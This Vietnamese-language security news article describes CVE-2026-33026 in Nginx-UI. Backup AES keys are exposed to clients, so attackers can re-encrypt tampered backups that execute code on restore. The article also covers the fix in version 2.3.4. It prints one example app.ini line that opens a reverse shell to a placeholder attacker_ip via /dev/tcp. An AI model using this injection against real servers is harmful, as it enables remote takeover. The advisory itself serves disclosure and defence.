Một lỗ hổng CVE Nginx-UI nghiêm trọng đã được công bố trong cơ chế sao lưu và khôi phục của Nginx-UI, được theo dõi dưới mã định danh CVE-2026-33026. Lỗ hổng này cho phép các tác nhân đe dọa thay đổi các tệp sao lưu được mã hóa và chèn các cấu hình độc hại trong quá trình khôi phục. Với việc mã khai thác (PoC) công khai hiện đã có sẵn, các triển khai chưa được vá lỗi đang đối mặt với nguy cơ bị chiếm quyền điều khiển hệ thống toàn diện ngay lập tức.
Phân tích kỹ thuật lỗ hổng CVE-2026-33026
Bản chất và Nguyên nhân gốc rễ
Nguyên nhân cốt lõi của lỗ hổng CVE Nginx-UI này nằm ở một mô hình tin cậy vòng tròn bị lỗi nghiêm trọng trong kiến trúc sao lưu của ứng dụng. Khi Nginx-UI tạo một bản sao lưu, nó nén các tệp thành các kho lưu trữ ZIP và mã hóa chúng bằng AES-256-CBC.
Tuy nhiên, hệ thống không duy trì một gốc tin cậy (trusted root of trust). Thay vì bảo mật các tham số mã hóa ở phía máy chủ, khóa AES và Khởi tạo Vector (IV) lại được cung cấp trực tiếp cho máy khách dưới dạng một mã thông báo bảo mật sao lưu (backup security token).
Hơn nữa, tệp siêu dữ liệu về tính toàn vẹn, chứa các hàm băm SHA-256 của các tệp được mã hóa, cũng được mã hóa bằng chính khóa này. Do kẻ tấn công có được khóa, họ có thể dễ dàng vượt qua tất cả các kiểm soát bảo mật mật mã.
Thêm vào mức độ nghiêm trọng, quá trình khôi phục không thực thi việc xác minh tính toàn vẹn một cách nghiêm ngặt. Điều này cho phép các hoạt động khôi phục tiếp tục ngay cả khi có các cảnh báo hệ thống về sự không khớp hàm băm (hash mismatches).
Cộng đồng an ninh mạng đã phân loại các điểm yếu cơ bản này theo nhiều phân loại khác nhau, bao gồm CWE-354 (Kiểm tra giá trị toàn vẹn không đúng cách) và CWE-347 (Không xác minh đúng cách chữ ký mật mã).
Quy trình khai thác và Cơ chế vượt qua kiểm soát bảo mật
Nhà nghiên cứu bảo mật ‘dapickle’ đã trình diễn thành công cách điểm yếu kiến trúc này có thể bị vũ khí hóa. Mã khai thác (PoC) được công bố công khai bao gồm các tập lệnh Python tự động hóa việc giải mã và xây dựng lại các tệp sao lưu của Nginx-UI.
Một kẻ tấn công bắt đầu bằng cách tạo một bản sao lưu tiêu chuẩn và trích xuất mã thông báo bảo mật từ các HTTP headers. Sử dụng một tập lệnh giải mã, chúng giải nén kho lưu trữ và sửa đổi tệp cấu hình nội bộ (app.ini).
Một vector tấn công phổ biến liên quan đến việc chèn một lệnh độc hại, chẳng hạn như StartCmd = bash, vào cấu hình. Ví dụ về việc chèn lệnh:
[Global]
... (các cấu hình khác)
StartCmd = bash -c 'bash -i >& /dev/tcp/attacker_ip/port 0>&1'
... (các cấu hình khác)
Kẻ tấn công sau đó sử dụng một tập lệnh xây dựng lại để nén các tệp đã sửa đổi, tính toán các hàm băm mới trông hợp lệ, cập nhật siêu dữ liệu và mã hóa lại toàn bộ gói bằng mã thông báo gốc.
Khi bản sao lưu đã bị giả mạo này được tải lên giao diện khôi phục của Nginx-UI, hệ thống sẽ mù quáng chấp nhận nó và thực thi payload đã chèn. Điều này dẫn đến remote code execution trên máy chủ.
Đánh giá Mức độ nghiêm trọng và Tác động
Điểm CVSS và Phân loại
Lỗ hổng CVE Nginx-UI này mang mức độ nghiêm trọng Critical (Nghiêm trọng), đạt điểm CVSS 4.0 tối đa trên nhiều chỉ số tác động khác nhau. Việc khai thác thành công có thể dẫn đến những hậu quả nghiêm trọng cho hệ thống bị ảnh hưởng.
Hậu quả tiềm tàng
Khai thác thành công cho phép kẻ tấn công:
- Thay đổi cấu hình ứng dụng vĩnh viễn.
- Chèn backdoor vào định tuyến Nginx.
- Đạt được quyền thực thi lệnh tùy ý (arbitrary command execution) trên máy chủ.
Khả năng chiếm quyền điều khiển toàn diện hệ thống là một rủi ro bảo mật đáng báo động, đòi hỏi các tổ chức phải hành động khẩn cấp.
Đối tượng ảnh hưởng và Biện pháp khắc phục
Các phiên bản Nginx-UI dễ bị tấn công
Lỗ hổng CVE-2026-33026 này ảnh hưởng đến gói Nginx-UI dựa trên Go, đặc biệt là các phiên bản 2.3.3 và các phiên bản cũ hơn.
Đáng chú ý, điểm yếu này là sự tái phát của một lỗ hổng đã được báo cáo trước đó, được ghi nhận trong cảnh báo GitHub GHSA-fhh2-gg7w-gwpq. Mặc dù một bản vá trước đó đã khắc phục việc truy cập trái phép vào các tệp sao lưu, nhưng nó hoàn toàn không giải quyết được vấn đề thiết kế mật mã cơ bản, khiến hệ thống về cơ bản vẫn dễ bị sửa đổi kho lưu trữ.
Khuyến nghị vá lỗi và Tăng cường bảo mật
Để giảm thiểu mối đe dọa CVE nghiêm trọng này, các quản trị viên phải nâng cấp ngay lập tức lên phiên bản đã được vá lỗi, tức là phiên bản 2.3.4.
Ngoài việc áp dụng bản vá bảo mật mới nhất, các nhà phát triển được khuyến nghị triển khai một gốc toàn vẹn đáng tin cậy ở phía máy chủ (server-side trusted integrity root). Điều này bao gồm việc ký siêu dữ liệu sao lưu bằng một khóa riêng tư thay vì dựa vào các mã thông báo bị lộ ra phía máy khách.
Hơn nữa, các hệ thống phải được cấu hình an toàn để tránh các mô hình tin cậy vòng tròn và phải hủy bỏ hoạt động khôi phục một cách nghiêm ngặt nếu bất kỳ xác minh hàm băm nào không thành công. Việc này sẽ giúp ngăn chặn các cuộc tấn công khai thác lỗ hổng CVE Nginx-UI trong tương lai.
